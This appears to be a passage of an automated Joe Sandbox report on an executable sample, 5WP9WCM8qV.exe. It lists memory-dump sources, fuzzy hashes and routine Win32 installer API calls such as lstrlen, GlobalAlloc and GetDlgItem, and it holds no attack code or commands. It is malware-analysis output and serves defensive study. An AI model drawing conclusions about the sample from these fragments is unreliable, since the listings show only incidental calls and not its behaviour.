                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nse2681.tmp$C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll
                                        • API String ID: 3109718747-871299093
                                        • Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                        • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                                        • Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                        • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: FreeGlobal
                                        • String ID:
                                        • API String ID: 2979337801-0
                                        • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                        • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                        • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                        • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                        • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                        • GlobalFree.KERNEL32(00000000), ref: 10001642
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                        • String ID:
                                        • API String ID: 1148316912-0
                                        • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                        • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                        • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                        • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00401D00
                                        • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                        • DeleteObject.GDI32(00000000), ref: 00401D4B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                        • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                        • Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                        • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                        APIs
                                        • GetDC.USER32(?), ref: 00401D59
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                        • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                        • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                        • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                        • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                        • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                        APIs
                                        • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                        • wsprintfW.USER32 ref: 00404A1A
                                        • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                        • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                        • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                        • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                        APIs
                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                        • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                        • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                        • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                        APIs
                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-4083868402
                                        • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                        • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                                        • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                        • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                        • GetTickCount.KERNEL32 ref: 00402DBB
                                        • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                        • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                        • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                        • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                        • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00405157
                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                          • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                        • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                        • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                        • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                        APIs
                                        • FreeLibrary.KERNEL32(?,75573420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                        • GlobalFree.KERNEL32(?), ref: 0040382A
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-4083868402
                                        • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                        • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                                        • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                        • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                                        APIs
                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5WP9WCM8qV.exe,C:\Users\user\Desktop\5WP9WCM8qV.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5WP9WCM8qV.exe,C:\Users\user\Desktop\5WP9WCM8qV.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-1876063424
                                        • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                        • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                        • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                        • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                        • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                        • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                        • GlobalFree.KERNEL32(?), ref: 10001203
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                        • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                        • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                        • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                        • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                        • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                        • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                        • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9